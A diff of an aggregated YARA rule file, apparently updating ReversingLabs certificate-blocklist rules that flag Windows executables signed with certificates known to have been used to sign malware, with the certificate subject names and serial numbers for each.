@@ -26549,21 +48943,21 @@ rule REVERSINGLABS_Cert_Blocklist_6726Bd04204746C46857887F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "67:26:bd:04:20:47:46:c4:68:57:88:7f" and 1474352405 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM LIMITED" and pe.signatures [ i ] . serial == "63:33:ed:61:8f:88:a0:5b:4d:82:ad:7b:f6:6c:b0:fa" and 1616457600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4463D8B31E0F87C14233D4D0D2C487A0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3B777165B125Bccc181D0Bac3F5B55B3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eefd6fa2-7ed7-51d0-bddd-90f0727a93cc"
+		id = "f065e99f-9cce-55cb-a592-60b89c26028a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14638-L14654"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8714-L8730"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "04ce664fceb4a617294e860d5364d8a4ce8e055fd2baebb8be69f258d9c70ac7"
+		logic_hash = "80aff3d6f45f5847d5d39b170b9d0e70168d02569ca6d86a2c39150399d290fc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26573,21 +48967,21 @@ rule REVERSINGLABS_Cert_Blocklist_4463D8B31E0F87C14233D4D0D2C487A0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "44:63:d8:b3:1e:0f:87:c1:42:33:d4:d0:d2:c4:87:a0" and 1477612800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAND ALONE MUSIC LTD" and pe.signatures [ i ] . serial == "3b:77:71:65:b1:25:bc:cc:18:1d:0b:ac:3f:5b:55:b3" and 1607299200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_387982605E542D6D52F231Ca6F5657Cc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5B37Ac3479283B6F9D75Ddf0F8742D06 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2d5731e1-b18b-544e-ae14-40d70b679618"
+		id = "cc124d3f-2446-57a2-a206-0a5e569fc703"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14656-L14672"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8732-L8748"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d55cfd45bc0d330c0ed433a882874e4633ffbaa0d68288bea9058fe269d75ed9"
+		logic_hash = "b7abd389ac31cd970e6611c7c303714fdd658f45d4857ad524f5e8368edbb875"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26597,21 +48991,21 @@ rule REVERSINGLABS_Cert_Blocklist_387982605E542D6D52F231Ca6F5657Cc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "38:79:82:60:5e:54:2d:6d:52:f2:31:ca:6f:56:57:cc" and 1475884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ART BOOK PHOTO s.r.o." and pe.signatures [ i ] . serial == "5b:37:ac:34:79:28:3b:6f:9d:75:dd:f0:f8:74:2d:06" and 1619740800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E0134C41E7Eda6863C4Eee5B003976Dd : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3112C69D460C781Fd649C71E61Bfec82 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "395c14fd-2fec-53ad-bc8e-2dd4bb3522d2"
+		id = "f4d2f240-49a7-51f3-8db1-1c569aa63177"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14674-L14692"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8750-L8766"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fbe34baf52e3fa7d7cdfcfaef9b8851c4cbeb46d17eeade61750e59cf0c13291"
+		logic_hash = "ed31b0a24d18a451163867f0f49df12af3ca0768f250ac8ce66d41405393130d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26621,21 +49015,21 @@ rule REVERSINGLABS_Cert_Blocklist_E0134C41E7Eda6863C4Eee5B003976Dd : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5000 LIMITED" and ( pe.signatures [ i ] . serial == "00:e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd" or pe.signatures [ i ] . serial == "e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd" ) and 1528070400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KREATURHANDLER BJARNE ANDERSEN ApS" and pe.signatures [ i ] . serial == "31:12:c6:9d:46:0c:78:1f:d6:49:c7:1e:61:bf:ec:82" and 1614902400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5B47A4739Dd8Ffe81D9B5307 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A5B4F67Ad8B22Afc2Debe6Ce5F8F679 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9688b091-9a77-59c2-b7f9-a8b652201b8f"
+		id = "7dd5ba42-2d04-52d7-b15a-2bdba2e742fb"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14694-L14710"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8768-L8784"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5f35f520d4af26fa648553894a5b0db043d0c32302d94f531b6cb48691396a92"
+		logic_hash = "938efb7ee19970484aded5cd46b2ff730f8882706bec3f062bdebde3cc9a4799"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26645,21 +49039,21 @@ rule REVERSINGLABS_Cert_Blocklist_5B47A4739Dd8Ffe81D9B5307 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "5b:47:a4:73:9d:d8:ff:e8:1d:9b:53:07" and 1476953007 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Farad LLC" and pe.signatures [ i ] . serial == "0a:5b:4f:67:ad:8b:22:af:c2:de:be:6c:e5:f8:f6:79" and 1607472000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4F5A9Bf75Da76B949645475473793A7D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Df45B36C9D0Bd248C3F9494E7Ca822 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "90cdf420-bdfc-509a-a64f-f30710f09f3b"
+		id = "d7d0d1c4-b341-5651-8179-4035f537ba98"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14712-L14728"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8786-L8804"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8c58d30b1b6ef80409d9da5f5f4bc26a8818b01cc388b5966c8b68ed0e4c5a2a"
+		logic_hash = "9c03522376b0d807cd36a0641e474d770bc3b4f8221f26d232878d2d320d072b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26669,21 +49063,21 @@ rule REVERSINGLABS_Cert_Blocklist_4F5A9Bf75Da76B949645475473793A7D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXEC CONTROL LIMITED" and pe.signatures [ i ] . serial == "4f:5a:9b:f7:5d:a7:6b:94:96:45:47:54:73:79:3a:7d" and 1553817600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MPO STORITVE d.o.o." and ( pe.signatures [ i ] . serial == "00:df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" or pe.signatures [ i ] . serial == "df:45:b3:6c:9d:0b:d2:48:c3:f9:49:4e:7c:a8:22" ) and 1619740800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_081Df56C9A48D02571F08907 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Ae3C4Eccecda2127D43Be390A850Dda : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4f4fb099-406a-5def-9a26-46c6807cfe7f"
+		id = "a9d8906b-64f6-5c5d-80e0-ab916e83b613"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14730-L14746"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8806-L8822"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "25d91f09e0731ab09a05855442b72589eb30e1c7d5e4c0a7af760eea540d786f"
+		logic_hash = "8a2ff4f7a5ac996127778b1670e79291bddcb5dee6e7da2b540fd254537ee27e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26693,21 +49087,21 @@ rule REVERSINGLABS_Cert_Blocklist_081Df56C9A48D02571F08907 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "08:1d:f5:6c:9a:48:d0:25:71:f0:89:07" and 1474870728 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PARTYNET LIMITED" and pe.signatures [ i ] . serial == "1a:e3:c4:ec:ce:cd:a2:12:7d:43:be:39:0a:85:0d:da" and 1614902400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_77D5C1A3E623575999C74409Dc19753C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2E36360538624C9B1Afd78A2Fb756028 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8f8ce24d-8330-509a-a7a1-2727c6f8bdd9"
+		id = "549a566b-0c94-516c-9231-a5e54136785f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14748-L14764"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8824-L8840"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "54921ce39a0876511b33ac6fa088c3342e2ea7fa037423fe72825bfe9c83bce6"
+		logic_hash = "9cbb50c7d383048fd506506fa9ee8bf7c6d82feaf21bcde4008ab99b82e234a7"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26717,21 +49111,21 @@ rule REVERSINGLABS_Cert_Blocklist_77D5C1A3E623575999C74409Dc19753C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "77:d5:c1:a3:e6:23:57:59:99:c7:44:09:dc:19:75:3c" and 1475884800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ts Trade ApS" and pe.signatures [ i ] . serial == "2e:36:36:05:38:62:4c:9b:1a:fd:78:a2:fb:75:60:28" and 1615766400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E9756B3F38B1172Ea89Fdbdfdba5F979 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Addb899F8229Fd53E6435E08Bbd3A733 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "77d7470c-0c60-5ef4-b1d9-35642c147afe"
+		id = "1e5f0577-ba05-5e43-a817-c75f65547c3d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14766-L14784"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8842-L8860"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "997a9433f907896d82f22ae323bf9cfe9aa04a2a49c5505e98adbb34277fcc15"
+		logic_hash = "ecb8e31b8c56b92cef601618e0adc2f6d88999318805b92389693aa9e8050d18"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26741,21 +49135,21 @@ rule REVERSINGLABS_Cert_Blocklist_E9756B3F38B1172Ea89Fdbdfdba5F979 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kreamer Ltd" and ( pe.signatures [ i ] . serial == "00:e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79" or pe.signatures [ i ] . serial == "e9:75:6b:3f:38:b1:17:2e:a8:9f:db:df:db:a5:f9:79" ) and 1492732800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "U.K. STEEL EXPORTS LIMITED" and ( pe.signatures [ i ] . serial == "00:ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33" or pe.signatures [ i ] . serial == "ad:db:89:9f:82:29:fd:53:e6:43:5e:08:bb:d3:a7:33" ) and 1616630400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_09Fb28 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C1A1Db95D7Bf80290Aa6E82D8F8F996A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e7701457-c6cd-5b20-b227-8a9cdcde8213"
+		id = "c04a2731-5eb8-5db4-9e88-cab9b61952e4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14786-L14802"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8862-L8880"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5ed65d33b73977e869460ba51271aff94811fa2f41e4a2993c47233add2f38dd"
+		logic_hash = "84c7c0e53facadcdfd752e9cf3811fbfd6aac4bef4109acf430a67b6dcd37bfc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26765,21 +49159,21 @@ rule REVERSINGLABS_Cert_Blocklist_09Fb28 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "New Dial spa" and pe.signatures [ i ] . serial == "09:fb:28" and 1046968418 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Software Two Pty Ltd" and ( pe.signatures [ i ] . serial == "00:c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a" or pe.signatures [ i ] . serial == "c1:a1:db:95:d7:bf:80:29:0a:a6:e8:2d:8f:8f:99:6a" ) and 1615334400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_197Dc32D915458953562D2Fe78Bf2468 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C667Ffe3A5B0A5Ae7Cf3A9E41682E91B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9c25410f-6a3d-5e6e-b270-ccec3be34e80"
+		id = "83a5e5c2-0932-526b-80aa-800b37088bbd"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14804-L14820"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8882-L8900"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e61284a74765592fe97b90ca1c260efa46ea31286e6d09ab32d6c664b8271f2a"
+		logic_hash = "be2cd688f2d7c458ee764bd7a7250e0116328702db5585b444d631f05cdc701b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26789,21 +49183,21 @@ rule REVERSINGLABS_Cert_Blocklist_197Dc32D915458953562D2Fe78Bf2468 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Y.L. Knafo, Ltd." and pe.signatures [ i ] . serial == "19:7d:c3:2d:91:54:58:95:35:62:d2:fe:78:bf:24:68" and 1575331200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NAILS UNLIMITED LIMITED" and ( pe.signatures [ i ] . serial == "00:c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" or pe.signatures [ i ] . serial == "c6:67:ff:e3:a5:b0:a5:ae:7c:f3:a9:e4:16:82:e9:1b" ) and 1616976000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7C0Be3D14787351E3156F5F37F2B3663 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E0A83917660D05Cf476374659D3C7B85 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "14a292da-36c1-5a37-b27e-20c982e44c25"
+		id = "3387f396-01f7-58b1-a5bd-b308105c66d6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14822-L14838"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8902-L8920"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "66c2cd84fccedd2afef00495c49d0c2844e2e5e190e6a859d2970e8ddb4a35c2"
+		logic_hash = "f60753ecb775d664e07e78611568799eaf06fb4742bcef3bf0c28202daf98c50"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26813,21 +49207,21 @@ rule REVERSINGLABS_Cert_Blocklist_7C0Be3D14787351E3156F5F37F2B3663 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Apex Tech, SIA" and pe.signatures [ i ] . serial == "7c:0b:e3:d1:47:87:35:1e:31:56:f5:f3:7f:2b:36:63" and 1523318400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PIK MOTEL S.R.L." and ( pe.signatures [ i ] . serial == "00:e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85" or pe.signatures [ i ] . serial == "e0:a8:39:17:66:0d:05:cf:47:63:74:65:9d:3c:7b:85" ) and 1621468800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_05054Fdea356F3Dd7Db479Fa : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Afc5522898143Aafaab7Fd52304Cf00C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c78d42bc-f8ca-579a-af49-ba9c7b63ef07"
+		id = "016ad027-bd6a-58e0-9099-341b81dd6f70"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14840-L14856"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8922-L8940"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "02ec52e060a6b8b3edfad0a1f5b1f2d6c409645d5233612d0d353ad74bcd4568"
+		logic_hash = "bfcf2fbbd9be97202eeb44c0f81f0a0713d4d30c466f2b170231c7f9df0e9e6d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26837,21 +49231,21 @@ rule REVERSINGLABS_Cert_Blocklist_05054Fdea356F3Dd7Db479Fa : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "05:05:4f:de:a3:56:f3:dd:7d:b4:79:fa" and 1474436511 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YAN CHING LIMITED" and ( pe.signatures [ i ] . serial == "00:af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c" or pe.signatures [ i ] . serial == "af:c5:52:28:98:14:3a:af:aa:b7:fd:52:30:4c:f0:0c" ) and 1622419200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_08Aaa069E92517F21Ce67Ca713F6Ea63 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8B3333D32B2C2A1D33B41Ba5Db9D4D2D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d468530e-8a51-583e-a108-e409f0144165"
+		id = "f7f72cd2-0bf4-5aa7-804e-4ae354eda055"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14858-L14874"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L8942-L8960"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "28ad7e9c75a701425003cde4a7eb10fa471394628cd5004412778d8d7cddb50b"
+		logic_hash = "cdb3f1983ed17df22d17c6321bc2ead2c391d70fdca4a9f6f4784f62196b85d0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -26861,21 +49255,21 @@ rule REVERSINGLABS_Cert_Blocklist_08Aaa069E92517F21Ce67Ca713F6Ea63 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "pioneersoft" and pe.signatures [ i ] . serial == "08:aa:a0:69:e9:25:17:f2:1c:e6:7c:a7:13:f6:ea:63" and 1368403200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOOK CAF\\xC3\\x89, s.r.o." and ( pe.signatures [ i ] . serial == "00:8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" or pe.signatures [ i ] . serial == "8b:33:33:d3:2b:2c:2a:1d:33:b4:1b:a5:db:9d:4d:2d" ) and 1620000000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1B7B54E0Dd4D7E45A0B46834De52658D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fbb1198Bd8Bddb0D693Eb72A8613Fe3F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "376da749-3cd4-5e37-b1ee-013e839f98ce"
+		id = "f9983426-9f05-56e2-8ad0-1c5a48ab04be"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
